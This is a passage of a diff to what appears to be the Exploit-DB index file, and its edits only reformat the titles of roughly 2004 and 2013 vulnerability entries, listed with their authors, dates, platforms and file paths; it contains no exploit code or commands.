Misrepresentation",2004-03-31,http-equiv,windows,remote,0 +23904,platforms/multiple/dos/23904.txt,"Roger Wilco Server 1.4.1 - Unauthorized Audio Stream Denial of Service",2004-03-31,"Luigi Auriemma",multiple,dos,0 23905,platforms/windows/remote/23905.txt,"ADA IMGSVR 0.4 - Remote Directory Listing",2004-04-01,"Donato Ferrante & Dr_insane",windows,remote,0 23906,platforms/windows/remote/23906.txt,"ADA IMGSVR 0.4 - Remote File Download",2004-04-01,"Donato Ferrante",windows,remote,0 -23907,platforms/cgi/webapps/23907.pl,"Aborior Encore Web Forum Remote Arbitrary Command Execution",2004-04-03,K-159,cgi,webapps,0 +23907,platforms/cgi/webapps/23907.pl,"Aborior Encore Web Forum - Remote Arbitrary Command Execution",2004-04-03,K-159,cgi,webapps,0 23908,platforms/php/webapps/23908.txt,"OpenBB 1.0.6 MyHome.php SQL Injection",2004-04-05,"Mark Tesn",php,webapps,0 23909,platforms/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal",2004-04-05,dr_insane,windows,remote,0 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Local Privilege Escalation",2004-04-06,"Ian Vitek",windows,local,0 23911,platforms/windows/dos/23911.txt,"Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23912,platforms/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plugin - Remote Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23913,platforms/cgi/webapps/23913.txt,"Floosietek FTGate Mail Server 1.2 - index.fts folder Parameter XSS",2004-04-06,dr_insane,cgi,webapps,0 -23914,platforms/cgi/webapps/23914.txt,"Floosietek FTGate Mail Server 1.2 Path Disclosure",2004-04-06,dr_insane,cgi,webapps,0 -23915,platforms/windows/dos/23915.txt,"Adobe Photoshop 8.0 COM Objects Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 +23914,platforms/cgi/webapps/23914.txt,"Floosietek FTGate Mail Server 1.2 - Path Disclosure",2004-04-06,dr_insane,cgi,webapps,0 +23915,platforms/windows/dos/23915.txt,"Adobe Photoshop 8.0 - COM Objects Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23916,platforms/windows/dos/23916.txt,"Blaxxun Contact 3D X-CC3D Browser Object Buffer Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23917,platforms/windows/dos/23917.txt,"Panda ActiveScan 5.0 ASControl.DLL Remote Heap Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23918,platforms/windows/dos/23918.txt,"Panda ActiveScan 5.0 ascontrol.dll Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 @@ -21183,7 +21183,7 @@ id,file,description,date,author,platform,type,port 23983,platforms/php/webapps/23983.txt,"TikiWiki Project 1.8 - tiki-list_trackers.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23984,platforms/php/webapps/23984.txt,"TikiWiki Project 1.8 - tiki-list_blogs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23986,platforms/cgi/webapps/23986.txt,"Blackboard Learning System 5.x/6.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,"DarC KonQuest",cgi,webapps,0 -23987,platforms/cgi/remote/23987.txt,"SurgeLDAP 1.0 User.CGI Directory Traversal",2004-04-12,dr_insane,cgi,remote,0 +23987,platforms/cgi/remote/23987.txt,"SurgeLDAP 1.0 - User.CGI Directory Traversal",2004-04-12,dr_insane,cgi,remote,0 23988,platforms/php/webapps/23988.txt,"Nuked-Klan 1.x - Multiple Vulnerabilities",2004-04-12,frog,php,webapps,0 23989,platforms/windows/local/23989.c,"Microsoft Windows 2000/NT 4 - Local Descriptor Table Local Privilege Escalation",2004-04-18,mslug@safechina.net,windows,local,0 23990,platforms/php/webapps/23990.txt,"PHP-Nuke 6.x/7.x - CookieDecode Cross-Site Scripting",2004-04-13,waraxe,php,webapps,0 @@ -21206,7 +21206,7 @@ id,file,description,date,author,platform,type,port 24008,platforms/php/webapps/24008.html,"SCT Campus Pipeline 1.0/2.x/3.x - Email Attachment Script Injection",2004-04-15,"spiffomatic 64",php,webapps,0 24009,platforms/php/webapps/24009.txt,"Gemitel 3.50 Affich.php Remote File Inclusion Command Injection",2004-04-15,jaguar,php,webapps,0 24010,platforms/windows/dos/24010.txt,"Real Networks Helix Universal Server 9.0.x - Denial of Service",2004-04-15,anonymous,windows,dos,0 -24011,platforms/multiple/dos/24011.pl,"KPhone 2.x/3.x/4.0.1 Malformed STUN Packet Denial of Service",2004-04-08,storm,multiple,dos,0 +24011,platforms/multiple/dos/24011.pl,"KPhone 2.x/3.x/4.0.1 - Malformed STUN Packet Denial of Service",2004-04-08,storm,multiple,dos,0 24012,platforms/windows/remote/24012.html,"WinSCP 3.5.6 Long URI Handling Memory Corruption",2004-04-16,"Luca Ercoli",windows,remote,0 24013,platforms/multiple/dos/24013.txt,"Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service",2004-04-17,"K. K. Mookhey",multiple,dos,0 24014,platforms/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 Nested File Manual Scan Bypass",2004-04-17,"Bipin Gautam",windows,local,0 @@ -21215,7 +21215,7 @@ id,file,description,date,author,platform,type,port 24017,platforms/windows/remote/24017.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)",2013-01-10,sickness,windows,remote,0 24018,platforms/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload",2013-01-10,Metasploit,php,remote,0 24019,platforms/multiple/remote/24019.rb,"Ruby on Rails XML Processor YAML Deserialization Code Execution",2013-01-10,Metasploit,multiple,remote,0 -24020,platforms/windows/remote/24020.rb,"Microsoft Internet Explorer Option Element Use-After-Free",2013-01-10,Metasploit,windows,remote,0 +24020,platforms/windows/remote/24020.rb,"Microsoft Internet Explorer - Option Element Use-After-Free",2013-01-10,Metasploit,windows,remote,0 24021,platforms/windows/remote/24021.rb,"Honeywell Tema Remote Installer ActiveX Remote Code Execution",2013-01-10,Metasploit,windows,remote,0 24022,platforms/windows/dos/24022.txt,"Nero MediaHome 4.5.8.0 - Denial of Service",2013-01-10,"High-Tech Bridge SA",windows,dos,0 24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5 / 1.3.6 - Denial of Service",2013-01-10,UberLame,hardware,dos,0 @@ -21225,12 +21225,12 @@ id,file,description,date,author,platform,type,port 24027,platforms/linux/local/24027.txt,"UTempter 0.5.x - Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",linux,local,0 24028,platforms/windows/remote/24028.pl,"Kinesphere Corporation Exchange POP3 4.0/5.0 - Remote Buffer Overflow",2004-04-20,"securma massine",windows,remote,0 24029,platforms/windows/dos/24029.pl,"RhinoSoft Serv-U FTP Server 3.x/4.x/5.0 LIST Parameter Buffer Overflow",2004-04-20,storm,windows,dos,0 -24030,platforms/multiple/remote/24030.c,"Multiple Vendor TCP Sequence Number Approximation (1)",2004-03-05,"Matt Edman",multiple,remote,0 -24031,platforms/multiple/remote/24031.pl,"Multiple Vendor TCP Sequence Number Approximation (2)",2004-04-20,"Paul A. Watson",multiple,remote,0 -24032,platforms/multiple/remote/24032.txt,"Multiple Vendor TCP Sequence Number Approximation (3)",2004-04-20,"Paul Watson",multiple,remote,0 -24033,platforms/multiple/remote/24033.pl,"Multiple Vendor TCP Sequence Number Approximation (4)",2004-04-23,K-sPecial,multiple,remote,0 +24030,platforms/multiple/remote/24030.c,"Multiple Vendor - TCP Sequence Number Approximation (1)",2004-03-05,"Matt Edman",multiple,remote,0 +24031,platforms/multiple/remote/24031.pl,"Multiple Vendor - TCP Sequence Number Approximation (2)",2004-04-20,"Paul A. Watson",multiple,remote,0 +24032,platforms/multiple/remote/24032.txt,"Multiple Vendor - TCP Sequence Number Approximation (3)",2004-04-20,"Paul Watson",multiple,remote,0 +24033,platforms/multiple/remote/24033.pl,"Multiple Vendor - TCP Sequence Number Approximation (4)",2004-04-23,K-sPecial,multiple,remote,0 24034,platforms/php/webapps/24034.txt,"phProfession 2.5 modules.php offset Parameter SQL Injection",2004-04-23,"Janek Vind",php,webapps,0 -24035,platforms/php/webapps/24035.txt,"phProfession 2.5 upload.php Direct Request Path Disclosure",2004-04-23,"Janek Vind",php,webapps,0 +24035,platforms/php/webapps/24035.txt,"phProfession 2.5 - upload.php Direct Request Path Disclosure",2004-04-23,"Janek Vind",php,webapps,0 24036,platforms/php/webapps/24036.txt,"phProfession 2.5 modules.php jcode Parameter XSS",2004-04-23,"Janek Vind",php,webapps,0 24037,platforms/php/webapps/24037.txt,"PostNuke Phoenix 0.726 openwindow.php hlpfile Parameter XSS",2004-04-21,"Janek Vind",php,webapps,0 24038,platforms/linux/remote/24038.txt,"Xine 0.9.x and Xine-Lib 1 - Multiple Remote File Overwrite Vulnerabilities",2004-04-22,anonymous,linux,remote,0 @@ -21242,8 +21242,8 @@ id,file,description,date,author,platform,type,port 24044,platforms/php/webapps/24044.txt,"phpLiteAdmin 1.9.3 - Remote PHP Code Injection",2013-01-11,L@usch,php,webapps,0 24045,platforms/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (1)",2013-01-11,Metasploit,java,remote,0 24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 - Ver.asp Information Disclosure",2004-04-23,CyberTalon,asp,webapps,0 -24050,platforms/php/webapps/24050.txt,"Advanced Guestbook 2.2 Password Parameter SQL Injection",2004-04-23,JQ,php,webapps,0 -24051,platforms/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4 Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",windows,dos,0 +24050,platforms/php/webapps/24050.txt,"Advanced Guestbook 2.2 - Password Parameter SQL Injection",2004-04-23,JQ,php,webapps,0 +24051,platforms/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4 - Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",windows,dos,0 24052,platforms/php/webapps/24052.txt,"OpenBB 1.0.x - member.php redirect Parameter XSS",2004-04-26,JeiAr,php,webapps,0 24053,platforms/php/webapps/24053.txt,"OpenBB 1.0.x - myhome.php to Parameter XSS",2004-04-26,JeiAr,php,webapps,0 24054,platforms/php/webapps/24054.txt,"OpenBB 1.0.x - post.php TID Parameter XSS",2004-04-26,JeiAr,php,webapps,0 @@ -21305,7 +21305,7 @@ id,file,description,date,author,platform,type,port 24112,platforms/windows/dos/24112.txt,"Microsoft Internet Explorer 6.0 XML Parsing Denial of Service",2004-05-10,"Rafel Ivgi The-Insider",windows,dos,0 24113,platforms/bsd/local/24113.c,"NetBSD/FreeBSD Port Systrace 1.x - Exit Routine Access Validation Privilege Escalation",2004-05-11,"Stefan Esser",bsd,local,0 24114,platforms/windows/remote/24114.html,"Microsoft Outlook 2003Mail Client E-mail Address Verification Weakness",2004-05-11,http-equiv,windows,remote,0 -24115,platforms/hardware/remote/24115.c,"Multiple Linksys Devices DHCP Information Disclosure",2004-05-31,"Jon Hart",hardware,remote,0 +24115,platforms/hardware/remote/24115.c,"Multiple Linksys Devices - DHCP Information Disclosure",2004-05-31,"Jon Hart",hardware,remote,0 24116,platforms/windows/remote/24116.txt,"Microsoft Internet Explorer 5_ Firefox 0.8_ OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification",2004-05-13,"Karol Wiesek",windows,remote,0 24117,platforms/windows/remote/24117.txt,"Microsoft Internet Explorer 6.0 Codebase Double Backslash Local Zone File Execution Weakness",2003-11-25,"Liu Die Yu",windows,remote,0 24118,platforms/windows/remote/24118.txt,"Microsoft Outlook Express 6.0 URI Obfuscation",2004-05-13,http-equiv,windows,remote,0 @@ -21355,7 +21355,7 @@ id,file,description,date,author,platform,type,port 24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 beta 2 - show.asp show Parameter XSS",2004-06-01,"Oliver Karow",windows,remote,0 24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 beta 2 - showperf.asp title Parameter XSS",2004-06-01,"Oliver Karow",windows,remote,0 24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 beta 2 - showini.asp Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0 -24164,platforms/cgi/webapps/24164.txt,"Rit Research Labs TinyWeb 1.9.2 Unauthorized Script Disclosure",2004-06-01,"Ziv Kamir",cgi,webapps,0 +24164,platforms/cgi/webapps/24164.txt,"Rit Research Labs TinyWeb 1.9.2 - Unauthorized Script Disclosure",2004-06-01,"Ziv Kamir",cgi,webapps,0 24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0 24166,platforms/php/webapps/24166.txt,"PHP-Nuke 5.x/6.x/7.x - Direct Script Access Security Bypass",2004-06-01,Squid,php,webapps,0 24167,platforms/php/webapps/24167.txt,"SquirrelMail 1.2.x - From Email Header HTML Injection",2004-06-03,anonymous,php,webapps,0 @@ -21367,7 +21367,7 @@ id,file,description,date,author,platform,type,port 24173,platforms/php/local/24173.txt,"PHP 4.3.x - Microsoft Windows Shell Escape Functions Command Execution",2004-06-07,"Daniel Fabian",php,local,0 24174,platforms/windows/remote/24174.txt,"Microsoft Internet Explorer 6.0 URL Local Resource Access Weakness",2004-06-06,"Rafel Ivgi The-Insider",windows,remote,0 24175,platforms/cgi/webapps/24175.txt,"Linksys Web Camera Software 2.10 Next_file Parameter File Disclosure",2004-06-07,"John Doe",cgi,webapps,0 -24176,platforms/php/webapps/24176.txt,"NetWin SurgeMail 1.8/1.9/2.0_WebMail 3.1 Error Message Path Disclosure",2004-06-07,"Donnie Werner",php,webapps,0 +24176,platforms/php/webapps/24176.txt,"NetWin SurgeMail 1.8/1.9/2.0_WebMail 3.1 - Error Message Path Disclosure",2004-06-07,"Donnie Werner",php,webapps,0 24177,platforms/php/webapps/24177.txt,"NetWin SurgeMail 1.8/1.9/2.0_WebMail 3.1 Login Form XSS",2004-06-07,"Donnie Werner",php,webapps,0 24178,platforms/windows/dos/24178.txt,"ToCA Race Driver Multiple Remote Denial of Service Vulnerabilities",2004-06-08,"Luigi Auriemma",windows,dos,0 24179,platforms/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure",2004-06-08,"Vickenty Fesunov",linux,remote,0 @@ -21403,9 +21403,9 @@ id,file,description,date,author,platform,type,port 24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - Remote module_db.php File Include",2004-06-15,loofus,php,webapps,0 24213,platforms/windows/remote/24213.txt,"Microsoft Internet Explorer 5.0.1 Wildcard DNS Cross-Site Scripting",2004-06-15,"bitlance winter",windows,remote,0 24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x - Registration_Rules.ASP Cross-Site Scripting",2004-06-15,"Ferruh Mavituna",asp,webapps,0 -24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 usersL.php3 - Multiple Parameter SQL Injection",2004-06-15,HEX,php,webapps,0 +24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 - usersL.php3 Multiple Parameter SQL Injection",2004-06-15,HEX,php,webapps,0 24216,platforms/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 edituser.php3 do_not_login Variable Authentication Bypass",2004-06-15,HEX,php,webapps,0 -24217,platforms/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 admin.php3 - Arbitrary File Access",2004-06-15,HEX,php,webapps,0 +24217,platforms/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 - admin.php3 Arbitrary File Access",2004-06-15,HEX,php,webapps,0 24218,platforms/windows/remote/24218.cpp,"Symantec Enterprise Firewall 7.0/8.0 DNSD DNS Cache Poisoning",2004-06-15,fryxar,windows,remote,0 24219,platforms/windows/remote/24219.txt,"IBM ACPRunner 1.2.5 - ActiveX Control Dangerous Method",2004-06-16,"eEye Digital Security Team",windows,remote,0 24220,platforms/windows/remote/24220.html,"IBM EGatherer 2.0 - ActiveX Control Dangerous Method",2004-06-01,"eEye Digital Security Team",windows,remote,0 @@ -21436,9 +21436,9 @@ id,file,description,date,author,platform,type,port 24246,platforms/multiple/remote/24246.txt,"SCI Photo Chat 3.4.9 - Cross-Site Scripting",2004-07-20,"Donato Ferrante",multiple,remote,0 24247,platforms/multiple/dos/24247.txt,"Easy Chat Server 1.x - Multiple Denial of Service Vulnerabilities",2004-07-02,"Donato Ferrante",multiple,dos,0 24248,platforms/unix/dos/24248.txt,"IBM WebSphere Caching Proxy Server 5.0 2 - Denial of Service",2004-07-02,"Leandro Meiners",unix,dos,0 -24249,platforms/windows/remote/24249.html,"Microsoft Internet Explorer 6.0 Shell.Application Object Script Execution Weakness",2004-07-03,http-equiv,windows,remote,0 +24249,platforms/windows/remote/24249.html,"Microsoft Internet Explorer 6.0 - Shell.Application Object Script Execution Weakness",2004-07-03,http-equiv,windows,remote,0 24250,platforms/multiple/remote/24250.pl,"MySQL 4.1/5.0 - Authentication Bypass",2004-07-05,"Eli Kara",multiple,remote,0 -24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-spam 6.0 Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0 +24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0 24252,platforms/cgi/webapps/24252.txt,"fastream netfile ftp/web server 6.5/6.7 - Directory Traversal",2004-07-05,"Andres Tarasco Acuna",cgi,webapps,0 24253,platforms/multiple/remote/24253.txt,"12Planet Chat Server 2.9 - Cross-Site Scripting",2004-07-05,"Donato Ferrante",multiple,remote,0 24254,platforms/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 Email Header HTML Injection",2004-07-05,"Roman Medina-Heigl Hernandez",cgi,webapps,0 @@ -21470,14 +21470,14 @@ id,file,description,date,author,platform,type,port 24280,platforms/php/remote/24280.txt,"PHP 4.x/5.0 Strip_Tags() Function Bypass",2004-07-14,"Stefan Esser",php,remote,0 24281,platforms/windows/dos/24281.pl,"Microsoft Systems Management Server 1.2/2.0 - Remote Denial of Service",2004-07-14,HexView,windows,dos,0 24282,platforms/multiple/dos/24282.txt,"Gattaca Server 2003 web.tmpl Language Variable CPU Consumption DoS",2004-07-15,dr_insane,multiple,dos,0 -24283,platforms/multiple/dos/24283.txt,"Gattaca Server 2003 POP3 DoS",2004-07-15,dr_insane,multiple,dos,0 +24283,platforms/multiple/dos/24283.txt,"Gattaca Server 2003 POP3 - DoS",2004-07-15,dr_insane,multiple,dos,0 24284,platforms/cgi/webapps/24284.txt,"Gattaca Server 2003 Null Byte Path Disclosure",2004-07-15,dr_insane,cgi,webapps,0 -24285,platforms/cgi/webapps/24285.txt,"Gattaca Server 2003 Language Variable Path Exposure",2004-07-15,dr_insane,cgi,webapps,0 +24285,platforms/cgi/webapps/24285.txt,"Gattaca Server 2003 - Language Variable Path Exposure",2004-07-15,dr_insane,cgi,webapps,0 24286,platforms/cgi/webapps/24286.txt,"Gattaca Server 2003 - Cross-Site Scripting",2004-07-15,dr_insane,cgi,webapps,0 24287,platforms/cgi/webapps/24287.txt,"BoardPower Forum ICQ.CGI Cross-Site Scripting",2004-07-15,"Alexander Antipov",cgi,webapps,0 24288,platforms/windows/dos/24288.txt,"Symantec Norton Antivirus 2001/2002/2003/2004 Script Blocker Denial of Service",2004-07-16,vozzie,windows,dos,0 24289,platforms/php/webapps/24289.c,"Artmedic Webdesign Kleinanzeigen Script File Include",2004-07-19,"Adam Simuntis",php,webapps,0 -24290,platforms/php/webapps/24290.txt,"CuteNews 1.3 Comment HTML Injection",2004-07-19,DarkBicho,php,webapps,0 +24290,platforms/php/webapps/24290.txt,"CuteNews 1.3 - Comment HTML Injection",2004-07-19,DarkBicho,php,webapps,0 24291,platforms/php/webapps/24291.txt,"Outblaze Webmail - HTML Injection",2004-07-19,DarkBicho,php,webapps,0 24292,platforms/php/webapps/24292.txt,"Adam Ismay Print Topic Mod 1.0 - SQL Injection",2004-07-19,"Bartek Nowotarski",php,webapps,0 24293,platforms/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local,0 @@ -21529,7 +21529,7 @@ id,file,description,date,author,platform,type,port 24338,platforms/linux/remote/24338.c,"Citadel/UX 5.9/6.x - Username Buffer Overflow (1)",2004-07-30,CoKi,linux,remote,0 24339,platforms/linux/remote/24339.c,"Citadel/UX 5.9/6.x - Username Buffer Overflow (2)",2004-07-30,Nebunu,linux,remote,0 24340,platforms/php/webapps/24340.txt,"PowerPortal 1.1/1.3 - Private Message HTML Injection",2004-07-30,vampz,php,webapps,0 -24341,platforms/php/webapps/24341.txt,"FusionPHP Fusion News 3.3/3.6 Administrator Command Execution",2004-07-30,"Joseph Moniz",php,webapps,0 +24341,platforms/php/webapps/24341.txt,"FusionPHP Fusion News 3.3/3.6 - Administrator Command Execution",2004-07-30,"Joseph Moniz",php,webapps,0 24342,platforms/cgi/remote/24342.txt,"Webcam Corp Webcam Watchdog 4.0.1 sresult.exe Cross-Site Scripting",2004-08-02,dr_insane,cgi,remote,0 24343,platforms/windows/dos/24343.txt,"MailEnable 1.1x Content-Length Denial of Service",2004-07-30,CoolICE,windows,dos,0 24344,platforms/hardware/dos/24344.txt,"U.S. Robotics USR808054 Wireless Access Point - Web Administration Denial of Service",2004-08-02,"Albert Puigsech Galicia",hardware,dos,0 @@ -21557,23 +21557,23 @@ id,file,description,date,author,platform,type,port 24368,platforms/asp/webapps/24368.txt,"MapInfo Discovery 1.0/1.1 - Remote Log File Access Information Disclosure",2004-07-15,anonymous,asp,webapps,0 24369,platforms/asp/webapps/24369.txt,"MapInfo Discovery 1.0/1.1 MapFrame.asp mapname Parameter XSS",2004-07-15,anonymous,asp,webapps,0 24370,platforms/asp/webapps/24370.txt,"MapInfo Discovery 1.0/1.1 Cleartext Transmission Credential Disclosure",2004-07-15,anonymous,asp,webapps,0 -24371,platforms/asp/webapps/24371.txt,"MapInfo Discovery 1.0/1.1 Administrative Login Bypass",2004-07-15,anonymous,asp,webapps,0 +24371,platforms/asp/webapps/24371.txt,"MapInfo Discovery 1.0/1.1 - Administrative Login Bypass",2004-07-15,anonymous,asp,webapps,0 24372,platforms/php/webapps/24372.txt,"CuteNews 1.3.1 show_archives.php archive Parameter XSS",2004-07-16,"Debasis Mohanty",php,webapps,0 -24373,platforms/php/webapps/24373.txt,"PScript PForum 1.24/1.25 User Profile HTML Injection",2004-07-16,"Christoph Jeschke",php,webapps,0 +24373,platforms/php/webapps/24373.txt,"PScript PForum 1.24/1.25 - User Profile HTML Injection",2004-07-16,"Christoph Jeschke",php,webapps,0 24374,platforms/windows/local/24374.c,"Ipswitch IMail Server 7/8 Weak Password Encryption Weakness",1999-12-20,Adik,windows,local,0 24375,platforms/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x - Auth_Login.php SQL Injection",2004-07-16,"Fernando Quintero",php,webapps,0 24376,platforms/multiple/remote/24376.txt,"Opera Web Browser 7.5 Resource Detection Weakness",2004-07-17,"GreyMagic Software",multiple,remote,0 -24377,platforms/php/webapps/24377.txt,"Merak Mail Server 7.4.5 address.html Multiple Parameter XSS",2004-07-17,Criolabs,php,webapps,0 +24377,platforms/php/webapps/24377.txt,"Merak Mail Server 7.4.5 - address.html Multiple Parameter XSS",2004-07-17,Criolabs,php,webapps,0 24378,platforms/php/webapps/24378.txt,"Merak Mail Server 7.4.5 settings.html Multiple Parameter XSS",2004-07-17,Criolabs,php,webapps,0 24379,platforms/php/webapps/24379.txt,"Merak Mail Server 7.4.5 attachment.html attachmentpage_text_error Parameter XSS",2004-07-17,Criolabs,php,webapps,0 -24380,platforms/php/webapps/24380.txt,"Merak Mail Server 7.4.5 HTML Message Body XSS",2004-07-17,Criolabs,php,webapps,0 -24381,platforms/php/webapps/24381.txt,"Merak Mail Server 7.4.5 address.html Path Disclosure",2004-07-17,Criolabs,php,webapps,0 +24380,platforms/php/webapps/24380.txt,"Merak Mail Server 7.4.5 - HTML Message Body XSS",2004-07-17,Criolabs,php,webapps,0 +24381,platforms/php/webapps/24381.txt,"Merak Mail Server 7.4.5 - address.html Path Disclosure",2004-07-17,Criolabs,php,webapps,0 24382,platforms/php/webapps/24382.txt,"Merak Mail Server 7.4.5 calendar.html schedule Parameter SQL Injection",2004-07-17,Criolabs,php,webapps,0 24383,platforms/php/webapps/24383.php,"Gallery 1.4.4 - Remote Server-Side Script Execution",2004-07-17,aCiDBiTS,php,webapps,0 24384,platforms/php/webapps/24384.txt,"PHP-Fusion Database Backup Information Disclosure",2004-07-18,"Ahmad Muammar",php,webapps,0 24385,platforms/asp/webapps/24385.txt,"Zixforum ZixForum.mdb Database Disclosure",2004-07-19,"Security .Net Information",asp,webapps,0 24386,platforms/multiple/dos/24386.txt,"British National Corpus SARA - Remote Buffer Overflow",2004-07-20,"Matthias Bethke",multiple,dos,0 -24387,platforms/multiple/remote/24387.txt,"Nihuo Web Log Analyzer 1.6 HTML Injection",2004-08-20,"Audun Larsen",multiple,remote,0 +24387,platforms/multiple/remote/24387.txt,"Nihuo Web Log Analyzer 1.6 - HTML Injection",2004-08-20,"Audun Larsen",multiple,remote,0 24388,platforms/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server - Info Response Buffer Overflow",2004-08-20,Dimetrius,multiple,dos,0 24389,platforms/php/webapps/24389.txt,"Sympa 4.x - New List HTML Injection",2004-08-21,"Jose Antonio",php,webapps,0 24390,platforms/php/webapps/24390.txt,"Mantis 0.19 - Remote Server-Side Script Execution",2004-08-21,"Jose Antonio",php,webapps,0 @@ -21583,7 +21583,7 @@ id,file,description,date,author,platform,type,port 24394,platforms/multiple/dos/24394.txt,"Opera Web Browser 7.23 JavaScript Denial of Service",2004-08-21,sourvivor,multiple,dos,0 24395,platforms/windows/dos/24395.txt,"Microsoft Internet Explorer 6.0_ Firefox 0.8/0.9.x - JavaScript Denial of Service",2004-08-23,MeFakon,windows,dos,0 24396,platforms/php/webapps/24396.txt,"JShop E-Commerce Suite 3.0 - Page.php Cross-Site Scripting",2004-08-23,"Dr Ponidi Haryanto",php,webapps,0 -24397,platforms/asp/webapps/24397.txt,"Compulsive Media CNU5 News.mdb Database Disclosure",2004-08-23,"Security .Net Information",asp,webapps,0 +24397,platforms/asp/webapps/24397.txt,"Compulsive Media CNU5 - News.mdb Database Disclosure",2004-08-23,"Security .Net Information",asp,webapps,0 24398,platforms/linux/local/24398.sh,"IMWheel 1.0 Predictable Temporary File Creation",2004-08-23,I)ruid,linux,local,0 24399,platforms/php/webapps/24399.txt,"PhotoADay Pad_selected Parameter Cross-Site Scripting",2004-08-23,"King Of Love",php,webapps,0 24400,platforms/cgi/webapps/24400.txt,"Axis Network Camera 2.x And Video Server 1-3 - virtualinput.cgi Arbitrary Command Execution",2004-08-23,bashis,cgi,webapps,0 @@ -21615,7 +21615,7 @@ id,file,description,date,author,platform,type,port 24426,platforms/windows/dos/24426.html,"Opera Web Browser 7.23 Empty Embedded Object JavaScript Denial of Service",2004-09-01,Stevo,windows,dos,0 24432,platforms/windows/webapps/24432.txt,"Microsoft Internet Explorer 8 / 9 - Steal Any Cookie",2013-01-28,"Christian Haider",windows,webapps,0 24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 -24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals (gallery.php L param) - SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals - (gallery.php L param) SQL Injection",2013-02-17,3spi0n,php,webapps,0 24433,platforms/php/webapps/24433.txt,"php weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 24460,platforms/windows/remote/24460.rb,"VMware OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails JSON Processor YAML Deserialization Code Execution",2013-01-29,Metasploit,multiple,remote,0 @@ -21628,7 +21628,7 @@ id,file,description,date,author,platform,type,port 24443,platforms/hardware/webapps/24443.txt,"Buffalo TeraStation TS-Series - Multiple Vulnerabilities",2013-01-31,"Andrea Fabrizi",hardware,webapps,0 24444,platforms/php/remote/24444.rb,"DataLife Engine preview.php PHP Code Injection",2013-02-01,Metasploit,php,remote,0 24445,platforms/php/webapps/24445.txt,"Simple Machine Forum 2.0.x - < 2.0.4 File Disclosure/Path Traversal",2013-02-04,NightlyDev,php,webapps,0 -24448,platforms/windows/dos/24448.svg,"Opera SVG Use After Free",2013-02-05,Cons0ul,windows,dos,0 +24448,platforms/windows/dos/24448.svg,"Opera SVG - Use-After-Free",2013-02-05,Cons0ul,windows,dos,0 24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0 24450,platforms/freebsd/dos/24450.txt,"FreeBSD 9.1 ftpd Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos,0 24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0 @@ -21648,7 +21648,7 @@ id,file,description,date,author,platform,type,port 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 